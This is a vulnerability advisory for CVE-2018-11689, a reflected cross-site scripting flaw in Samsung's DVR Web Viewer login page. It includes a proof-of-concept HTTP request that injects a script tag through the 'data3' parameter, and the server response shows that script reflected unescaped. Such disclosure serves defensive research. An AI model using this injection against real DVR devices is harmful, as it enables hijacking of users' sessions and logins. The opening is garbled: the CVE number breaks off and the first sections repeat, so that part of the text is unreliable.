I. VULNERABILITY
-------------------------
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)

II. CVE REFERENCE
-------------------------
CVE-2018-1 I. VULNERABILITY
-------------------------
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)

II. CVE REFERENCE
-------------------------
CVE-2018-11689

III. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689

IV. CREDIT
-------------------------
Yavuz Atlas - Biznet Bilisim
http://www.biznet.com.tr/biznet-guvenlik-duyurulari

V. DESCRIPTION
-------------------------
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is
vulnerable to cross-site scripting. The vulnerability allows remote
attackers to inject arbitrary web script or HTML.

VI. PROOF OF CONCEPT
-------------------------
Request:
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script>
HTTP/1.1
Host: 10.10.10.10

Response:
HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true
Content-type: text/html
Connection: close
Date: Wed, 23 May 2018 11:14:09 GMT
Server: lighttpd/1.4.35
Content-Length: 10797
a|
function setcookie(){
var val_rand = Math.random();
if(is_close_user_session == true)
document.login_page_submit.close_user_session.value = 1;
else
document.login_page_submit.close_user_session.value = 0;
document.login_page_submit.data1.value =
data_parser(document.login_page.data1.value);
document.login_page_submit.data2.value =
do_encrypt(document.login_page.data2.value);
document.login_page_submit.data3.value = </script><script>alert(1)</script>;
document.login_page_submit.data4.value = val_rand;
document.login_page_submit.submit();
}
a|